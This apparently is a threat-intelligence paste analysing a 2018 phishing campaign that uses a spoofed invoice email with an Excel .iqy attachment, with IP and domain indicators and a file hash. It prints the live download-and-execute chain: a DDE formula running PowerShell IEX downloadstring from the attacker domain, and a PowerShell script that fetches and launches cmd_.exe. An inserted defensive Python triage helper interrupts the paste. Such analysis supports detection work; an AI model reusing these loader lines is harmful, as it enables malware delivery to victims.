DarthInvader

1.dat 2.dat doc.xls cmd_.exe

Jun 5th, 2018
June 5, 2018: Phishing email arrives with the sender spoofed to look like your own company's email address, carrying an attachment.

Malware contact IP addresses:
95.213.251.149 Port 80
185.222.202.139 Port 80

Domain: brembotembo.com

Malware language: Russian

Subject: Unpaid invoice [ID:Sales invoice Z12_01 copy.iqy]
Body: No content

The attachment Sales invoice Z12_01 copy.iqy.iqy
Contents:
WEB
1
http://brembotembo[.]com/2.dat
2
a
3
b
4
c
5

Contents of 2.dat that gets downloaded:
=cmd|' /c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -NoExit -c IEX ((new-object net.webclient).downloadstring(\"http://brembotembo[.]com/1.dat\"))'!A0
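
As an added defender-side example (not part of this paste), a small Python triage helper that parses the .iqy layout shown above (query type, version, URL, then parameters), flags an external cleartext URL, and checks captured query data for the =application|topic!item DDE launch syntax seen in 2.dat. The samples are constructed to mirror the paste with the domain kept defanged, and TRUSTED_HOSTS is an assumed allowlist.

```python
import re

# Constructed samples mirroring the attachment and the 2.dat payload shown
# above; the domain is kept defanged with "[.]" so nothing here resolves.
SAMPLE_IQY = "WEB\n1\nhttp://brembotembo[.]com/2.dat\n2\na\n3\nb\n4\nc\n5\n"
SAMPLE_2DAT = ("=cmd|' /c C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
               " -nop -NoExit -c IEX ((new-object net.webclient)"
               ".downloadstring(\"http://brembotembo[.]com/1.dat\"))'!A0")

# DDE link syntax is =application|topic!item: a cell beginning that way makes
# Excel prompt to start the application named before the pipe.
DDE_RE = re.compile(r"^\s*=\s*\w+\s*\|.*!\w+", re.M)
URL_RE = re.compile(r"^(?P<scheme>[a-z][a-z0-9+.-]*)://(?P<host>[^/:?#]+)", re.I)

# Hosts the organisation legitimately serves web queries from (assumed list).
TRUSTED_HOSTS = {"intranet.example.com"}


def parse_iqy(text):
    """Split an .iqy body into fields: line 1 query type, line 2 version,
    line 3 URL; the remaining non-blank lines are query parameters."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        return None  # not a web query file
    return {"type": lines[0], "version": lines[1],
            "url": lines[2], "params": lines[3:]}


def has_dde_formula(content):
    """True if any line of the fetched query data is a DDE launch formula."""
    return DDE_RE.search(content) is not None


def triage_iqy(iqy_text, fetched=None):
    """List findings for an .iqy attachment and, optionally, the data its
    URL returned (captured by the analyst in a sandbox, not fetched here)."""
    findings = []
    q = parse_iqy(iqy_text)
    if q is None:
        return findings
    m = URL_RE.match(q["url"])
    if m and m["scheme"].lower() in ("http", "https") \
            and m["host"].lower() not in TRUSTED_HOSTS:
        findings.append("external-url:" + m["host"])
    if m and m["scheme"].lower() == "http":
        findings.append("cleartext-http")
    if fetched is not None and has_dde_formula(fetched):
        findings.append("dde-formula-in-response")
    return findings
```

Running triage_iqy(SAMPLE_IQY, SAMPLE_2DAT) reports the external cleartext URL and the DDE formula in the response.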
  29.  
Contents of 1.dat that gets downloaded:

$urls = "http://brembotembo[.]com/doc.xls",""
foreach($url in $urls){
    Try
    {
        Write-Host $url
        # drops the fetched file as cmd_.exe in %TEMP% and launches it
        $fp = "$env:temp\cmd_.exe"
        Write-Host $fp
        $wc = New-Object System.Net.WebClient
        $wc.DownloadFile($url, $fp)
        Start-Process $fp
        break
    }
    Catch
    {
        Write-Host $_.Exception.Message
    }
}

doc.xls is saved as cmd_.exe and executed.
SHA256 of cmd_.exe: 30e2f8e905e4596946e651627c450e3cc574fdf58ea6e41cdad1f06190a05216
https://www.virustotal.com/en/file/30e2f8e905e4596946e651627c450e3cc574fdf58ea6e41cdad1f06190a05216/analysis/1528207462/